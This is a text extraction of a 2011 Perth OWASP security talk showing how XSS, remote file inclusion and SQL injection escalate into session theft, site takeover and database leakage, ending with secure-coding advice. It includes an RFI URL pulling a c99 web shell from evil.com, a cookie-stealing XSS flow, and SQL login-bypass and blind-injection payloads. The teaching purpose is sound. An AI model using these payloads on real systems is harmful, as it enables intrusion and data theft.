![Page 1: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/1.jpg)
ANZTB SIGIST May 2011Perth OWASPHow minor vulnerabilities can do ‘‘‘‘very bad things’’’’ ™
Christian Frichot / David Taylor(Some of) Perth OWASP’’’’s Chapter Leads
Copyright © The OWASP FoundationPermission is granted to copy, distribute and/or modify this document under the terms of the OWASP License.
The OWASP Foundation
OWASP
http://www.owasp.org
Wednesday 25th May 2011
(Some of) Perth OWASP’’’’s Chapter Leads
![Page 2: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/2.jpg)
Introductions
Photo of handshake removed to
reduce file size.
OWASP
![Page 3: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/3.jpg)
OWASP
Why we think this is important.
![Page 4: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/4.jpg)
Impact Crater
4
![Page 5: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/5.jpg)
Photo of bored cat removed to reduce file size.
5
*bored cat
Photo of bored cat removed to reduce file size.
![Page 6: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/6.jpg)
Photo of scared cat removed to reduce file size.
6
*scared cat is scared
Photo of scared cat removed to reduce file size.
![Page 7: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/7.jpg)
Overview
�Overview of the evening
�From XSS to total session compromise
�Would you like some BeEF with your XSS?
�Remote File Include, an attackers best friend.
�When RFI met Metasploit
OWASP 7
�When RFI met Metasploit
�Useful SQL Injection
![Page 8: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/8.jpg)
A Brief History Of…
OWASP 8
![Page 9: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/9.jpg)
Cross Site Scripting (XSS)
"XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation and escaping. XSS allows attackers to execute script in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.“
OWASP 9
malicious sites.“
What does this mean?
�Attackers can execute scripts within a users browser.
�This may lead to defacement, session hijacking, browser redirection or even the installation of malware.
![Page 10: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/10.jpg)
Reflective XSS
Vulnerable App
Authenticated
User
Hi Joe,
We’ve noticed you
haven’t updated your
phone number Click
2. XSS script forces
Browser to submit
document.cookie
to Evil Server
OWASP 10Attacker
1.
phone number. Click
here to proceed.
Thanks.
Evil Server
3. document.cookie
4. Collect cookies
![Page 11: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/11.jpg)
Stored XSS
Vulnerable App
Attacker
Authenticated
User
1. Post comment on blog
Including XSS 2. Visits blog
okie
OWASP 11
Attacker
Evil Server
3. document.cookie4. Collect cookies
![Page 12: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/12.jpg)
Injection
"Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or access unauthorised data.“
OWASP 12
or access unauthorised data.“
What does this mean?
�Injection can result in data loss or corruption, lack of accountability, or denial of access.
�In worst case scenarios it can lead to complete host takeover. 12
![Page 13: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/13.jpg)
Setting the scene
�Your developers create a Secure Cloud Open Access Tool™
�Secure portal for exchanging files with customers.
�Your company, Acme, take their information
OWASP 13
�Your company, Acme, take their information very seriously, as most of their intellectual property is contained within.
![Page 14: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/14.jpg)
This slide left intentionally blankThis slide left intentionally blank
14
![Page 15: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/15.jpg)
Conclusions from Session Compromise
�According to the OWASP Top 10 of 2010, XSS is the most prevalent web application security flaw.
�The Web Hacking Incident Database (WHID) lists XSS as the 3rd top attack method.[1]
OWASP
lists XSS as the 3 top attack method.[1]
�Detecting XSS is easy.
�Open Source: w3af, rat, XSSscan.py, XSSFuzz etc
�Mixed Source: Burp! (If you buy one piece of software, buy this)
�Bling ($$) Source: IBM AppScan, HP WebInspect, NTOSpider
15[1] http://www.xiom.com/whid
![Page 16: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/16.jpg)
16
![Page 17: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/17.jpg)
Photo of person removed to reduce file size.
17
Session
Compromise
![Page 18: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/18.jpg)
OWASP 18
![Page 19: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/19.jpg)
BrowserExploitationFramework
OWASP 19
FrameworkPhoto of meat removed to reduce file size.
![Page 20: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/20.jpg)
OWASP
![Page 21: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/21.jpg)
(insert demo here)
OWASP
(insert demo here)
21
![Page 22: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/22.jpg)
Conclusions from BeEF injection ;)
�Why do things manually, when you can do them automagically?
�The web browser IS the operating system.
�Clearly demonstrates how a fairly trivial vulnerability can explode into something larger…
OWASP
vulnerability can explode into something larger…
![Page 23: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/23.jpg)
OWASP
![Page 24: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/24.jpg)
(insert break here)
OWASP
(insert break here)
24
![Page 25: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/25.jpg)
OWASP
![Page 26: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/26.jpg)
Photo of Nano car removed to reduce file size.
OWASP*Planet's cheapest car, the Nano.
Photo of Nano car removed to reduce file size.
![Page 27: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/27.jpg)
Photo of Bentley Coupe removed to reduce file size.
OWASP*This is a Bentley Coupe != planet’s cheapest car
Photo of Bentley Coupe removed to reduce file size.
![Page 28: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/28.jpg)
OWASP
![Page 29: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/29.jpg)
OWASP
![Page 30: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/30.jpg)
OWASP
![Page 31: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/31.jpg)
But how does an attacker deface a website?
�RFI or Remote File Inclusion
�Was in OWASP’s Top 10 in 2007
�Used to be highly prevalent in PHP until the default configuration was changed
�Exploits the require or include functions, eg:
OWASP
�Exploits the require or include functions, eg:
�Include $_GET[‘option’]
http://www.acme.com/scoat.php?language=http://evil.com/c99.txt
![Page 32: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/32.jpg)
(insert scariness here)
OWASP
(insert scariness here)
32
![Page 33: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/33.jpg)
Conclusions
�The web is a great channel for exploiting PCs
�Google’s research back in 2007 highlighted:
�“One in 10 web pages contained malicious code”
�F-secure 2010:
�“Adobe Reader files were exploited in almost 49% of
OWASP
�“Adobe Reader files were exploited in almost 49% of targeted attacks in 2009”
�Keep your applications up to date!
![Page 34: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/34.jpg)
OWASP
![Page 35: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/35.jpg)
SQL Injection
�The login page of the application is vulnerable to SQL Injection:
SELECT $id FROM dt_users WHERE user=‘$user’ AND pass=‘$pass’
�What happens if we make the username:
OWASP
�What happens if we make the username:
jdoe’ AND 1=1 --
�The SQL becomes…
SELECT $id FROM dt_users WHERE user=‘jdoe’ AND 1=1 – ‘ AND pass=‘$pass’
![Page 36: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/36.jpg)
Blind SQL Injection
�So, we can log into the app without a password - pretty cool.
�But what if we want to mess with the database some more?
�The SQL Injection is “blind” because none of the
OWASP
�The SQL Injection is “blind” because none of the results from the SELECT are echoed to the browser.
![Page 37: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/37.jpg)
Taking Over The World, 1 Bit At A Time
�Essentially we can get 1 bit of data from the database at a time:
�If the trailing condition evaluates to TRUE, the application gets logged in.
�If the trailing condition evaluates to FALSE you get
OWASP
�If the trailing condition evaluates to FALSE you get the password error message.
�For example:
�SELECT $id FROM dt_users WHERE user=‘jdoe’ AND 1<2 – TRUE
�SELECT $id FROM dt_users WHERE user=‘jdoe’ AND 1>2 – FALSE
![Page 38: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/38.jpg)
Lets take a short detour… Binary Search
Photo of detour sign removed to reduce file size.
OWASP
Photo of detour sign removed to reduce file size.
![Page 39: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/39.jpg)
Detour: Binary Search
OWASP
![Page 40: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/40.jpg)
Detour: Binary Search
�Example: Searching for an ASCII character
� Is character < ASCII code 128? Yes
� Is character < ASCII code 64? No
� Is character < ASCII code 96? Yes
� Is character < ASCII code 80? No
OWASP
� Is character < ASCII code 80? No
� Is character < ASCII code 88? No
� Is character < ASCII code 92? Yes
� Is character < ASCII code 90? Yes
� Is character < ASCII code 89? No
�Character is ASCII 89! (‘X’)
![Page 41: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/41.jpg)
Detour: Binary Search
�Each step in a binary search requires 1 bit of information.
�We have a SQL Injection bug that reveals 1 bit of information at a time.
�“Binary search, meet Blind SQL Injection. Blind
OWASP
�“Binary search, meet Blind SQL Injection. Blind SQL Injection, this is Binary Search.”
![Page 42: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/42.jpg)
Blind SQL Injection
�Setting it up…
SELECT version()CAST((SELECT version()) AS CHAR(4000))SUBSTRING(CAST((SELECT version()) AS
CHAR(4000)),1,1)
SELECT ASCII(SUBSTRING(CAST((SELECT version()) AS
CHAR(4000)),1,1))
OWASP
![Page 43: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/43.jpg)
Blind SQL Injection
�Putting it into action…
SELECT … WHERE user=‘jdoe’ AND 128>(SELECT
ASCII(SUBSTRING(CAST((SELECT version()) AS
CHAR(4000)),1,1)))
SELECT … WHERE user=‘jdoe’ AND 64>(SELECT
ASCII(SUBSTRING(CAST((SELECT version()) AS
CHAR(4000)),1,1)))
SELECT … WHERE user=‘jdoe’ AND 96>(SELECT
ASCII(SUBSTRING(CAST((SELECT version()) AS
CHAR(4000)),1,1)))
And so on… And so on… And so on… And THEN…
OWASP
And so on… And so on… And so on… And THEN…
SELECT … WHERE user=‘jdoe’ AND 128>(SELECT
ASCII(SUBSTRING(CAST((SELECT version()) AS
CHAR(4000)),2,1)))
And so on… And so on… And so on… And so on…
![Page 44: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/44.jpg)
Blind SQL Injection
Luckily there are tools to do this for us.
(insert pwnage here)
OWASP
![Page 45: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/45.jpg)
Conclusions (BSQLi)
�Tiny little blind SQL injection bugs can (eventually) leak your entire database
�BSQLi bugs are pretty hard to find (unless you’ve got the source code)
�Even after you’ve found them, they are
OWASP
�Even after you’ve found them, they are reasonably difficult (and noisy) to exploit
�Validate inputs and use parameterised queries
![Page 46: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/46.jpg)
No tools were harmed in the making of this presentation…
�BeEF
(http://www.bindshell.net/tools/beef/)
�Metasploit Framework
(http://www.metasploit.com/)
�SQLMap
OWASP
�SQLMap
(http://sqlmap.sourceforge.net/)
�SQL Power Injector *not demonstrated
(http://www.sqlpowerinjector.com/)
�Burp Suite Professional
(http://portswigger.net/burp/)
![Page 47: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/47.jpg)
Photo of many spanners removed to reduce file size.
OWASP 47
Photo of many spanners removed to reduce file size.
![Page 48: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/48.jpg)
OWASP 48
![Page 49: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/49.jpg)
OWASP 49
![Page 50: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/50.jpg)
OWASP Enterprise Security API (ESAPI)
�Don’t write your own security controls!
�Reinventing the wheel when it comes to developing security controls for every web application or web service leads to wasted time and massive security holes
OWASP
and massive security holes
50
![Page 51: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/51.jpg)
ESAPI – not just about preventing XSS/SQLi
�Authentication
�Access Control
�Input Validation
�Output encoding/escaping
Cryptography
OWASP
�Cryptography
�Error handling and logging
�Communication security
�HTTP security
�Security configuration
51
![Page 52: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/52.jpg)
OWASP’s Development Guide
�Allow businesses, developers, designers and solution architects to produce secure web applications
OWASP 52
![Page 53: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/53.jpg)
OWASP 53
![Page 54: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/54.jpg)
OWASP 54
![Page 55: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/55.jpg)
Wrapping it up
�Relatively innocuous bugs can be leveraged to do bad things (to the client or the server)
�Weaponised exploitation frameworks and tools currently exist
�Secure coding practices and security
OWASP
�Secure coding practices and security assessments to minimise exposure
![Page 56: ANZTB SIGIST May 2011 Perth OWASP How minor ... minor vulnerabilities can do very... · Perth OWASP How minor vulnerabilities can ... OWASP’s Development Guide ... Secure coding](https://reader034.vdocuments.site/reader034/viewer/2022042708/5ac5bd727f8b9a2b5c8dcc51/html5/thumbnails/56.jpg)
Photo of large question mark removed to reduce file size.Photo of large question mark removed to reduce file size.